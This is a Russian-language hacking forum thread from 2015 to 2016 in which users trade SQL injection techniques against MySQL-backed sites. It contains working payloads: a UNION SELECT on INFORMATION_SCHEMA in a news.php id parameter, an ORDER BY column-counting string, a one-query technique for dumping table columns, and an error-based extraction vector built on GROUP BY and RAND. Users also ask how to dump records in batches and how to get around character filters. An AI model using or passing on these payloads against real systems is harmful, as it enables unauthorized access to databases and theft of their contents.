10.04.2015, 21:41
|
|
Новичок
Регистрация: 17.12.2010
Сообщений: 28
С нами:
8106806
Репутация:
0
|
|
Может есть софт который проверяет параметры страницы на инъекцию?
а то бывает что данные не выводятся, или ещё что-то такое.
|
|
|
29.04.2015, 16:02
|
|
Новичок
Регистрация: 01.09.2012
Сообщений: 28
С нами:
7208246
Репутация:
0
|
|
интересует вот что
INFORMATION_SCHEMA.TABLES открывается вот таким способом
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 1,1 --
если кроме INFORMATION_SCHEMA на сайте есть
bd1
db2
как их открыть? |
|
|
|
11.06.2015, 17:19
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от psihoz26
↑
Хочу добавить про подбор колонок в 1 запрос.
В случае если sqli выводит ошибки и пэйлоад вида
выдаст нам ошибку
Код:
Query failed: Unknown column '100' in 'order clause'
То сразу смело вставляем такой пэйлоад
Код:
+order+by+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70+--+
В ответ получим
Код:
Query failed: Unknown column '*' in 'order clause'
Где '*'-1='колличество наших колонок'.
|
|
|
|
11.06.2015, 18:22
|
|
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами:
8142806
Репутация:
324
|
|
|
|
|
|
26.11.2015, 07:53
|
|
Новичок
Регистрация: 26.11.2015
Сообщений: 1
С нами:
5507606
Репутация:
0
|
|
Сообщение от Strilo4ka
↑
И напоследок значения с колонок(без пробелов!)
SELECT(MID(CONCAT(@p:=0x20,(SELECT(COUNT(*))FROM({ TABLE})WHERE@p:=CONCAT(@p,0x0D0A,{COLUMN1},0x3a,{C OLUMN2})),@p),5))
Приветствую! А подскажите как правильно преобразоватть этот запрос с оператором LIMIT, что бы мне выводилось, к примеру, из COLUMN1,COLUMN2 только первые 5к записей, а не все сразу.
|
|
|
|
27.12.2015, 11:49
|
|
Новичок
Регистрация: 02.02.2012
Сообщений: 24
С нами:
7513526
Репутация:
31
|
|
Если вдруг кому будет интересно, немного о том почему вообще работает метод вывода данных в тексте ошибки Duplicate entry '[data]' for key 'group_key'вынес в отдельную статью:
Error-Based SQL injection в MySQL
И максимально сокращенный вектор этого метода выглядит теперь вот так:
Код:
SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2)x GROUP BY MID([YOUR_QUERY], FLOOR(RAND(33)*2), 64)
|
|
|
|
27.09.2016, 00:43
|
|
Новичок
Регистрация: 26.09.2016
Сообщений: 1
С нами:
5068406
Репутация:
0
|
|
Вопрос) Если в инъекции нельзя заюзать точку и тем самым не могу сделать например [...] SELECT * FROM INFORMATION_SCHEMA.TABLES [...] пробовал заюзать CHAR() но почему-то в названии таблицы не пашет
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
